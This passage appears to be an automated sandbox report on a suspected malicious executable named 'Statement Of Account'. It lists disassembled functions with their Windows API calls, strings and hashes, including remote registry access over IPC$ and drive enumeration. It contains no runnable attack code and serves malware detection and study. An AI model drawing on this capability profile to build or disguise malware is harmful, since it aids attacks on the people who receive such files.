alias PlayMe, xrefs: 0045EF47
open , xrefs: 0045EF18

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
Instruction ID: e5e6e3524f15ee9b53aa238c1547bf14c0af5fa70a1fb0ad50a0449216793e57
Opcode Fuzzy Hash: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
Instruction Fuzzy Hash: F321A53164830476E220FB51DC87F9E7798AB84B14F200D3BBA407A0D1DBA8E94CC76E

Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00445A8D
GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
__wcsicoll.LIBCMT ref: 00445AC4
__wcsicoll.LIBCMT ref: 00445AE0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D

Strings

list, xrefs: 00445B1F
largeicons, xrefs: 00445ABE
SHELLDLL_DefView, xrefs: 00445AAA
details, xrefs: 00445ADA
smallicons, xrefs: 00445AF6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll$ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 3125838495-3381328864
Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769

Function 0046F90E Relevance: 19.6, APIs: 13, Instructions: 147windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
DeleteObject.GDI32(?), ref: 0046F950
DestroyCursor.USER32(?), ref: 0046F95E
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
DeleteObject.GDI32(?), ref: 0046F9CF
DestroyCursor.USER32(?), ref: 0046F9DD
ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
DestroyCursor.USER32(?), ref: 0046FA4F
SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
DeleteObject.GDI32(?), ref: 0046FA68
DestroyCursor.USER32(?), ref: 0046FA76

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CursorDestroy$DeleteMessageObjectSend$ImageLoad$ExtractIcon
String ID:
API String ID: 3924271234-0
Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A

Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0047998B
Conversion of parameters failed, xrefs: 00479A97
NULL Pointer assignment, xrefs: 004799B3, 00479C7F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CopyVariant$ErrorLast
String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
API String ID: 2286883814-4206948668
Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA

Function 004556F8 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847

Strings

,, xrefs: 004557A5
tooltips_class32, xrefs: 00455840, 0045591F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateWindow
String ID: ,$tooltips_class32
API String ID: 716092398-3856767331
Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59

Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E

Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984

GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
_wcscpy.LIBCMT ref: 00475F18

Strings

ramdisk, xrefs: 00475E85
all, xrefs: 00475DEE
removable, xrefs: 00475E2E
unknown, xrefs: 00475EA2
HH, xrefs: 00475D9D
a, xrefs: 00475EBE
fixed, xrefs: 00475E4B
network, xrefs: 00475E68
cdrom, xrefs: 00475E0E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy_wcslen
String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
API String ID: 3052893215-4176887700
Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B

Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON

Download Yara Rule

APIs

StringFromIID.COMBASE(?,?), ref: 004582E5

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

CoTaskMemFree.COMBASE(?), ref: 00458335
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
RegQueryValueExW.ADVAPI32 ref: 00458381
CLSIDFromString.COMBASE(00000000,?), ref: 004583AF
RegQueryValueExW.ADVAPI32 ref: 004583E8
LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486

Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1

RegCloseKey.ADVAPI32(?), ref: 004584BA

Strings

\TypeLib, xrefs: 00458319
Version, xrefs: 004583DA
interface\, xrefs: 00458300

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
String ID: Version$\TypeLib$interface\
API String ID: 656856066-939221531
Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A

Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
__swprintf.LIBCMT ref: 0045E6EE
_printf.LIBCMT ref: 0045E7A9
_printf.LIBCMT ref: 0045E7D2

Strings

Line %d (File "%s"):, xrefs: 0045E6E8
^ ERROR, xrefs: 0045E746
Error: , xrefs: 0045E76A
%s (%d) : ==> %s:%s%s, xrefs: 0045E7A4
%s (%d) : ==> %s:, xrefs: 0045E7CD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: LoadString_printf$__swprintf_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 3590180749-2354261254
Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A

Function 00452E2A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 154COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00452E62
__i64tow.LIBCMT ref: 00452E7E
__swprintf.LIBCMT ref: 00452E9E
__swprintf.LIBCMT ref: 00452EB9
_wcscpy.LIBCMT ref: 00452ED6
_wcscpy.LIBCMT ref: 00452F10

Strings

%.15g, xrefs: 00452E98
0x%p, xrefs: 00452EB3
True, xrefs: 00452ED0
False, xrefs: 00452EE7

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __swprintf_wcscpy$__i64tow__itow
String ID: %.15g$0x%p$False$True
API String ID: 3038501623-2263619337
Opcode ID: 7b8e0de2511f5af4d8d0822e3c6977e40dd5bee4b5bc8329dee76eef781b5613
Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
Opcode Fuzzy Hash: 7b8e0de2511f5af4d8d0822e3c6977e40dd5bee4b5bc8329dee76eef781b5613
Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E

Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

_memset.LIBCMT ref: 00458194
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
CLSIDFromString.COMBASE(00000000,?), ref: 00458279
RegCloseKey.ADVAPI32(00000000), ref: 0045828F
RegCloseKey.ADVAPI32(00000000), ref: 00458296

Strings

SOFTWARE\Classes\, xrefs: 00458123
\CLSID, xrefs: 00458141
\IPC$, xrefs: 004581B2

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 2255324689-22481851
Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A

Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
RegCloseKey.ADVAPI32(?), ref: 00458615

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
__wcsicoll.LIBCMT ref: 004585D6
IIDFromString.COMBASE(?,?), ref: 004585EB
RegCloseKey.ADVAPI32(?), ref: 004585F8

Strings

(, xrefs: 00458603
interface, xrefs: 00458509
interface\, xrefs: 00458551

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
String ID: ($interface$interface\
API String ID: 2231185022-3327702407
Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A

Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 004365A5
gethostname.WS2_32(00000100,00000100), ref: 004365BC
gethostbyname.WS2_32(00000101), ref: 004365C6
_wcscpy.LIBCMT ref: 004365F5
WSACleanup.WS2_32 ref: 004365FD
inet_ntoa.WS2_32(00000100), ref: 00436624
_strcat.LIBCMT ref: 0043662F
_wcscpy.LIBCMT ref: 00436644
WSACleanup.WS2_32 ref: 00436652
_wcscpy.LIBCMT ref: 00436666

Strings

0.0.0.0, xrefs: 004365EF

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2691793716-3771769585
Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB

Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
__crt_waiting_on_module_handle.LIBCMT ref: 00416B2F

Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
__lock.LIBCMT ref: 00416B8A
InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
__lock.LIBCMT ref: 00416BAB
___addlocaleref.LIBCMT ref: 00416BC9

Strings

EncodePointer, xrefs: 00416B4C
DecodePointer, xrefs: 00416B60
KERNEL32.DLL, xrefs: 00416B1E, 00416B23, 00416B2E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
